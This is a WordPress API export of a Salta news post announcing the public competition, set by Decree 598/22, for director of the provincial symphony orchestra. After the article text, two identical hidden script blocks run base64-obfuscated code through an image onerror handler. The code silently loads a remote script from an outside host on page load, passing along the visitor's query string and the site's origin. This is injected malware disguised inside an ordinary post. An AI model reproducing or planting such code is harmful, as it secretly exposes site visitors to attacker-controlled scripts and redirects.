{"id":1345,"date":"2022-08-22T09:55:54","date_gmt":"2022-08-22T12:55:54","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1345"},"modified":"2025-08-14T00:37:48","modified_gmt":"2025-08-14T03:37:48","slug":"llamado-a-concurso-publico-para-la-cobertura-de-la-direccion-de-la-orquesta-sinfonica-de-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1345","title":{"rendered":"Llamado a Concurso P\u00fablico para la cobertura de la Direcci\u00f3n de la Orquesta Sinf\u00f3nica de Salta"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#850c2a\">Mediante Decreto N\u00b0 598\/22, el Gobierno de la provincia de Salta dio a conocer los requisitos para participar del Concurso para la Cobertura del Cargo de Director de la Orquesta Sinf\u00f3nica de la provincia.<\/h4>\n\n\n\n<p>El Instituto de M\u00fasica y Danza ser\u00e1 la Autoridad de Aplicaci\u00f3n y de la coordinaci\u00f3n del procedimiento concursal, que ser\u00e1 de alcance provincial, nacional e internacional, y quien resulte seleccionado ser\u00e1 designado en el cargo por un periodo de 3 (tres) a\u00f1os.<\/p>\n\n\n\n<p><strong>Los aspirantes deber\u00e1n reunir los siguientes requisitos:<\/strong><\/p>\n\n\n\n<p>&#8211; Poseer t\u00edtulo espec\u00edfico universitario y\/o idoneidad acreditada con experiencia en el cargo. Se valorar\u00e1 la experiencia de 3 (tres) a\u00f1os como m\u00ednimo (consecutivos o no) en cargos de Direcci\u00f3n de Orquesta Profesional<\/p>\n\n\n\n<p>&#8211; Tener 18 (dieciocho) a\u00f1os de edad como m\u00ednimo, cumplidos a la fecha de inicio de las inscripciones (excluyente).<\/p>\n\n\n\n<p>&#8211; Hablar y escribir idioma castellano.<\/p>\n\n\n\n<p>&#8211; No poseer antecedentes penales.<\/p>\n\n\n\n<p><strong>&nbsp;Las etapas de evaluaci\u00f3n ser\u00e1n las siguientes:<\/strong><\/p>\n\n\n\n<p>&#8211; Evaluaci\u00f3n de antecedentes y proyectos.<\/p>\n\n\n\n<p>&#8211; Prueba de oposici\u00f3n.<\/p>\n\n\n\n<p>&#8211; Entrevistas personales y psicol\u00f3gicas.<\/p>\n\n\n\n<p>El cronograma se definir\u00e1 a partir de la publicaci\u00f3n del Decreto que autoriza el llamado a Concurso por parte de la Autoridad de Aplicaci\u00f3n.<\/p>\n\n\n\n<p>A priori, el Decreto N\u00b0 598\/22 prev\u00e9 la inscripci\u00f3n de manera presencial, por correspondencia y por correo electr\u00f3nico.<\/p>\n\n\n\n<p>Las resoluciones, decisiones o comunicaciones de car\u00e1cter general que dicte la Autoridad de Aplicaci\u00f3n relacionadas con el procedimiento concursal se realizar\u00e1n por el sitio digital oficial de la Secretar\u00eda de Cultura de la Provincia de Salta<\/p>\n\n\n\n<p>M\u00e1s informaci\u00f3n en Cultura Salta &#8211; www.culturasalta.gov.ar<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/llamado-a-concurso-publico-para-la-cobertura-de-la-direccion-de-la-orquesta-sinfonica-de-salta-84309\" target=\"_blank\" rel=\"noreferrer noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Mediante Decreto N\u00b0 598\/22, el Gobierno de la provincia de Salta dio a conocer los requisitos para participar del Concurso para la Cobertura del Cargo de Director de la Orquesta Sinf\u00f3nica de la provincia. El Instituto de M\u00fasica y Danza ser\u00e1 la Autoridad de Aplicaci\u00f3n y de la coordinaci\u00f3n del procedimiento concursal, que ser\u00e1 de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1346,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[21],"tags":[],"class_list":{"0":"post-1345","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1345"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1345"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1345\/revisions"}],"predecessor-version":[{"id":7384,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1345\/revisions\/7384"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1346"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1345"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1345"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1345"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}